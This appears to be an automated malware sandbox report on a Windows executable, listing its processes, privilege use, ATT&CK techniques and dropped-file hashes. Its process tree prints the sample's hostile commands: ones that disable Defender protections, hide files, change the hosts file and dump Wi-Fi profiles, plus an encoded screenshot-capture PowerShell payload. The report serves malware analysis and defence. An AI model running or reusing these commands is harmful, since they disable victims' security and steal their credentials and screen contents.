0000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
2892	powershell.exe
2892	powershell.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
688	powershell.exe
688	powershell.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Token: SeIncreaseQuotaPrivilege	240	wmic.exe
Token: SeSecurityPrivilege	240	wmic.exe
Token: SeTakeOwnershipPrivilege	240	wmic.exe
Token: SeLoadDriverPrivilege	240	wmic.exe
Token: SeSystemProfilePrivilege	240	wmic.exe
Token: SeSystemtimePrivilege	240	wmic.exe
Token: SeProfSingleProcessPrivilege	240	wmic.exe
Token: SeIncBasePriorityPrivilege	240	wmic.exe
Token: SeCreatePagefilePrivilege	240	wmic.exe
Token: SeBackupPrivilege	240	wmic.exe
Token: SeRestorePrivilege	240	wmic.exe
Token: SeShutdownPrivilege	240	wmic.exe
Token: SeDebugPrivilege	240	wmic.exe
Token: SeSystemEnvironmentPrivilege	240	wmic.exe
Token: SeRemoteShutdownPrivilege	240	wmic.exe
Token: SeUndockPrivilege	240	wmic.exe
Token: SeManageVolumePrivilege	240	wmic.exe
Token: 33	240	wmic.exe
Token: 34	240	wmic.exe
Token: 35	240	wmic.exe
Token: 36	240	wmic.exe
Token: SeIncreaseQuotaPrivilege	240	wmic.exe
Token: SeSecurityPrivilege	240	wmic.exe
Token: SeTakeOwnershipPrivilege	240	wmic.exe
Token: SeLoadDriverPrivilege	240	wmic.exe
Token: SeSystemProfilePrivilege	240	wmic.exe
Token: SeSystemtimePrivilege	240	wmic.exe
Token: SeProfSingleProcessPrivilege	240	wmic.exe
Token: SeIncBasePriorityPrivilege	240	wmic.exe
Token: SeCreatePagefilePrivilege	240	wmic.exe
Token: SeBackupPrivilege	240	wmic.exe
Token: SeRestorePrivilege	240	wmic.exe
Token: SeShutdownPrivilege	240	wmic.exe
Token: SeDebugPrivilege	240	wmic.exe
Token: SeSystemEnvironmentPrivilege	240	wmic.exe
Token: SeRemoteShutdownPrivilege	240	wmic.exe
Token: SeUndockPrivilege	240	wmic.exe
Token: SeManageVolumePrivilege	240	wmic.exe
Token: 33	240	wmic.exe
Token: 34	240	wmic.exe
Token: 35	240	wmic.exe
Token: 36	240	wmic.exe
Token: SeIncreaseQuotaPrivilege	1504	wmic.exe
Token: SeSecurityPrivilege	1504	wmic.exe
Token: SeTakeOwnershipPrivilege	1504	wmic.exe
Token: SeLoadDriverPrivilege	1504	wmic.exe
Token: SeSystemProfilePrivilege	1504	wmic.exe
Token: SeSystemtimePrivilege	1504	wmic.exe
Token: SeProfSingleProcessPrivilege	1504	wmic.exe
Token: SeIncBasePriorityPrivilege	1504	wmic.exe
Token: SeCreatePagefilePrivilege	1504	wmic.exe
Token: SeBackupPrivilege	1504	wmic.exe
Token: SeRestorePrivilege	1504	wmic.exe
Token: SeShutdownPrivilege	1504	wmic.exe
Token: SeDebugPrivilege	1504	wmic.exe
Token: SeSystemEnvironmentPrivilege	1504	wmic.exe
Token: SeRemoteShutdownPrivilege	1504	wmic.exe
Token: SeUndockPrivilege	1504	wmic.exe
Token: SeManageVolumePrivilege	1504	wmic.exe
Token: 33	1504	wmic.exe
Token: 34	1504	wmic.exe
Token: 35	1504	wmic.exe
Token: 36	1504	wmic.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 4036 wrote to memory of 3872	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	78
PID 4036 wrote to memory of 3872	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	78
PID 4036 wrote to memory of 2212	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	79
PID 4036 wrote to memory of 2212	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	79
PID 4036 wrote to memory of 240	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	80
PID 4036 wrote to memory of 240	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	80
PID 4036 wrote to memory of 1504	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	82
PID 4036 wrote to memory of 1504	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	82
PID 4036 wrote to memory of 2892	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	83
PID 4036 wrote to memory of 2892	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	83
PID 4036 wrote to memory of 2784	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	84
PID 4036 wrote to memory of 2784	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	84
PID 4036 wrote to memory of 4304	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	85
PID 4036 wrote to memory of 4304	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	85
PID 4036 wrote to memory of 688	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	86
PID 4036 wrote to memory of 688	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	86
PID 4036 wrote to memory of 576	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	87
PID 4036 wrote to memory of 576	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	87
PID 4036 wrote to memory of 3768	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	88
PID 4036 wrote to memory of 3768	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	88
PID 4036 wrote to memory of 3396	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	89
PID 4036 wrote to memory of 3396	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	89
PID 4036 wrote to memory of 4844	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	90
PID 4036 wrote to memory of 4844	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	90
PID 4036 wrote to memory of 1156	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	91
PID 4036 wrote to memory of 1156	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	91
PID 4036 wrote to memory of 2364	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	92
PID 4036 wrote to memory of 2364	4036	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe	92
PID 2364 wrote to memory of 5116	2364	powershell.exe	93
PID 2364 wrote to memory of 5116	2364	powershell.exe	93
PID 5116 wrote to memory of 436	5116	csc.exe	94
PID 5116 wrote to memory of 436	5116	csc.exe	94

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3872	attrib.exe
2212	attrib.exe
3396	attrib.exe
1156	attrib.exe

C:\Users\Admin\AppData\Local\Temp\758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
"C:\Users\Admin\AppData\Local\Temp\758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4036
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
  2⤵
  - Views/modifies file attributes
  PID:3872
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:2212
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:240
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:1504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2892
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:2784
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:4304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:688
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:576
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:3768
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:3396
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  PID:4844
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:1156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of WriteProcessMemory
  PID:2364
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2c5bufot\2c5bufot.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5116
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5302.tmp" "c:\Users\Admin\AppData\Local\Temp\2c5bufot\CSCDF5F2315B61940FFB38BA89AB5D4C057.TMP"
      4⤵
      PID:436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b0a85f07903eaad4aace8865ff28679f

SHA1
caa147464cf2e31bf9b482c3ba3c5c71951566d1

SHA256
c85c7915e0bcc6cc3d7dd2f6b9d9e4f9a3cf0ccefa043b1c500facac8428bfd5

SHA512
7a650a74a049e71b748f60614723de2b9d2385a0f404606bcb22ae807e22a74c53cf672df9e7a23605dfff37865443a5899eafea323134a818eb59c96e0f94bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\2c5bufot\2c5bufot.dll

Filesize
4KB

MD5
d4d845c942b82fcb3d59acfc826b7eb5

SHA1
7ef77520f785ae260df7f42c97d4b5c80cac0a2f

SHA256
c6c49423ad05347cedfe98d643c4ee80f5002633f28981d581c5b1a854bc7b76

SHA512
a56fb0ee8de829e8eb9642aa084b559e365564e15f837f5935240011ffa75bf03c99f2b0ca9fdb30227458bf3ce89833951aed12062aa199b31095e870ca85a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5302.tmp

Filesize
1KB

MD5
b4965beedf1e3c412c4d33014dee43e8

SHA1
76ef7e11129a7d9c528e32e7a9309a8d42e081c7

SHA256
3621f9df67e8f7ebfaac980502349a985a6324838085782c0bf0c0c4a641edb1

SHA512
1b0e933c5fb2e0dbb691fb03ba5a6c02210cd196fc61258b0ca22a0c9a8dee40d0367368919a1a749b766316adf8cabaecd956e2e9f53bbb593fdf209a88a489

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2cf3komj.s3p.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\mOBi8pVHYt\Display (1).png

Filesize
402KB

MD5
